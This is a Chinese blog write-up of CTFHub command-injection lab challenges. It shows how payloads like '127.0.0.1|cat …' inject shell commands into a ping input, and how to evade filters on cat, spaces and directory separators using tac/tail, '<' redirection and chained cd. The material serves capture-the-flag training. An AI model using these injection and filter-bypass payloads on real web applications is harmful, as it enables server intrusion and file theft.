ctfhub rce 命令注入 过滤cat 过滤空格 过滤目录分隔符

命令注入

在这里插入图片描述

源码直接给了出来尝试127.0.0.1;ls
在这里插入图片描述

发现一串数字的php文件cat查看
127.0.0.1|cat 233382768628619.php
在这里插入图片描述

查看源码发现flag

过滤cat

在这里插入图片描述

这题和上一题差不多只不过把cat给过滤掉了,过滤了cat我们可以用一下几种方法绕过
tac 从最后一行倒序显示内容,并将所有内容输出
more 根据窗口大小,一页一页的现实文件内容
less 和more类似,但其优点可以往前翻页,而且进行可以搜索字符
head 只显示头几行
tail 只显示最后几行
nl 类似于cat -n,显示时输出行号
tailf 类似于tail -f
使用127.0.0.1|tail (flag文件名)
在这里插入图片描述

查看源码发现flag

过滤空格

在这里插入图片描述

源码直接给了出来发现把空格给过滤了
使用127.0.0.1|ls
在这里插入图片描述

查看flag
127.0.0.1|cat<flag_7294130653.php
在这里插入图片描述

过滤目录分隔符

在这里插入图片描述

源码将\过滤掉了
使用127.0.0.1|ls
在这里插入图片描述

127.0.0.1;cd flag_is_here;ls
在这里插入图片描述

然后直接cat得出flag
127.0.0.1;cd flag_is_here;cat flag_30272158003930.php
在这里插入图片描述

得出flag
还有部分晚点再发今天就暂时分享这么多

posted @ 2022-03-20 19:32  听梦外雪花飞  阅读(322)  评论(0编辑  收藏  举报